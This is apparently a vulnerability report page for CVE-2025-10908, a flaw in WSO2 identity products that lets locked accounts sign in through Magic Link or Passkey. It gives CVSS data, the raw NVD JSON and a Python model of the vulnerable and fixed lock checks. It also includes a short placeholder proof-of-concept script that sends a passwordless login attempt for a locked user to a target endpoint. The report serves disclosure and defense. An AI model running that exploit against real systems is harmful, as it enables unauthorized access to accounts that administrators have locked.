Security Vulnerability Report

CVE-2025-10908

Published: 2026-05-11 10:16:13
Last Modified: 2026-05-11 20:23:28
Source (NVD sourceIdentifier of the reporting CNA): ed10eef1-636d-4fbe-9993-6890dfa878f8

Description

Due to a lack of user account state validation during authentication, locked user accounts can be successfully authenticated using Magic Link or Pass Key methods. This bypasses the intended security control that should prevent access to accounts that have been locked. This vulnerability may allow unauthorized access to applications and sensitive data associated with accounts that should have been restricted via the account lock mechanism. It also undermines the effectiveness of the account lock mechanism intended to prevent further login attempts.

Weakness: CWE-863 (Incorrect Authorization), as assigned by the reporting source. The practical point is that the lock check lived on the password path only; any authenticator that issues a session (Magic Link, Passkey, or a future passwordless method) must evaluate account state itself, or the check must sit in a post-authentication step shared by every authenticator.
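The following is an added illustration of the flaw class, not WSO2 code and not derived from the vendor's fix. It models an authentication service whose password path enforces the account-lock state while the passwordless paths (Magic Link, Passkey) originally skipped it, then shows the corrected behaviour: one state check on every path, repeated when a magic-link token is redeemed, because the account may have been locked after the link was issued. The `User`, `AuthService`, token store and lock flag are constructed stand-ins for an identity server's account-state store.

```python
"""Model of the flaw class in CVE-2025-10908: account-lock state enforced on
the password path but skipped on passwordless paths (Magic Link, Passkey).

Added example, not WSO2 code. User records, token handling and the lock flag
are a constructed stand-in for an identity server's account-state store.
"""
import secrets
import time
from dataclasses import dataclass, field


class AccountLocked(Exception):
    """Raised when any authentication path reaches a locked account."""


@dataclass
class User:
    username: str
    password: str                         # plaintext only to keep the demo short
    locked: bool = False
    passkey_ids: set = field(default_factory=set)


class AuthService:
    """enforce_state_on_passwordless=False reproduces the vulnerable behaviour;
    True is the corrected behaviour (one state check on every path)."""

    def __init__(self, users, enforce_state_on_passwordless):
        self.users = {u.username: u for u in users}
        self.enforce = enforce_state_on_passwordless
        self.magic_tokens = {}            # token -> (username, expiry epoch seconds)

    def _check_account_state(self, user):
        if user.locked:
            raise AccountLocked(user.username)

    def login_password(self, username, password):
        user = self.users[username]
        self._check_account_state(user)   # enforced in both variants
        return secrets.compare_digest(user.password, password)

    def request_magic_link(self, username):
        user = self.users[username]
        if self.enforce:
            self._check_account_state(user)
        token = secrets.token_urlsafe(32)
        self.magic_tokens[token] = (username, time.time() + 300)
        return token                      # would be e-mailed in a real system

    def redeem_magic_link(self, token):
        username, expiry = self.magic_tokens.pop(token)
        if time.time() > expiry:
            raise ValueError("magic link expired")
        user = self.users[username]
        if self.enforce:
            # Re-check at redemption: the account may have been locked after
            # the link was issued, so the request-time check alone is not enough.
            self._check_account_state(user)
        return username

    def login_passkey(self, username, credential_id):
        user = self.users[username]
        if self.enforce:
            self._check_account_state(user)
        return credential_id in user.passkey_ids


def outcomes_for_locked_user(enforce):
    """Try every path against a locked account; return 'ok' or 'locked' per path."""
    svc = AuthService([User("alice", "pw", locked=True, passkey_ids={"cred-1"})],
                      enforce_state_on_passwordless=enforce)
    results = {}
    for path, attempt in (
        ("password", lambda: svc.login_password("alice", "pw")),
        ("magic_link", lambda: svc.redeem_magic_link(svc.request_magic_link("alice"))),
        ("passkey", lambda: svc.login_passkey("alice", "cred-1")),
    ):
        try:
            attempt()
            results[path] = "ok"
        except AccountLocked:
            results[path] = "locked"
    return results


def lock_between_request_and_redeem(enforce):
    """Issue a link while unlocked, lock the account, then redeem the link."""
    user = User("bob", "pw")
    svc = AuthService([user], enforce_state_on_passwordless=enforce)
    token = svc.request_magic_link("bob")
    user.locked = True                    # e.g. admin lock or too many failures
    try:
        svc.redeem_magic_link(token)
        return "ok"
    except AccountLocked:
        return "locked"


if __name__ == "__main__":
    print("vulnerable:", outcomes_for_locked_user(False))
    print("fixed:     ", outcomes_for_locked_user(True))
    print("lock after link issued, fixed:", lock_between_request_and_redeem(True))
```

When verifying a patched deployment, test each passwordless flow end to end against an account you have locked: request the link or start the passkey ceremony, complete it, and confirm no session is issued. Also lock an account after a link has been sent and confirm the pending link can no longer be redeemed.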

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration (CPE) data is available in the NVD record (vulnStatus: Received). The affected WSO2 products and versions are enumerated in the vendor advisory WSO2-2025-4388 (https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4388/); consult that advisory rather than assuming a version range.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Conceptual PoC for CVE-2025-10908
# Demonstrates the idea of an authentication bypass for locked accounts via Magic Link.
# The endpoint, request parameters and success markers below are illustrative
# placeholders, not WSO2's actual Magic Link or Passkey protocol; adapt them to
# the flow observed in the target's login page before use.
import requests

target = "https://target-wso2-instance.com/commonauth"
locked_user = "locked-user@example.com"  # placeholder: an account known to be locked

# Payload simulating a Magic Link or Passkey login attempt (illustrative fields)
payload = {
    "username": locked_user,
    "authType": "magic_link",  # or 'passkey'
}

response = requests.post(target, data=payload, timeout=15)

# A vulnerable server processes the passwordless attempt without checking the
# account-lock state. HTTP 200 plus a marker string is only a weak oracle; the
# conclusive check is whether redeeming the link (or completing the passkey
# ceremony) actually yields a session for the locked account.
if response.status_code == 200 and (
    "magic_link_sent" in response.text or "auth_success" in response.text
):
    print("[+] Exploit Successful: Authentication initiated for locked account.")
else:
    print("[-] Exploit Failed: Account lock enforced.")
```

References

WSO2 Security Advisory WSO2-2025-4388: https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4388/

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10908",
    "sourceIdentifier": "ed10eef1-636d-4fbe-9993-6890dfa878f8",
    "published": "2026-05-11T10:16:12.590",
    "lastModified": "2026-05-11T20:23:28.213",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Due to a lack of user account state validation during authentication, locked user accounts can be successfully authenticated using Magic Link or Pass Key methods. This bypasses the intended security control that should prevent access to accounts that have been locked.\n\nThis vulnerability may allow unauthorized access to applications and sensitive data associated with accounts that should have been restricted via the account lock mechanism. It also undermines the effectiveness of the account lock mechanism intended to prevent further login attempts."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "ed10eef1-636d-4fbe-9993-6890dfa878f8",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-863"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4388/",
        "source": "ed10eef1-636d-4fbe-9993-6890dfa878f8"
      }
    ]
  }
}
```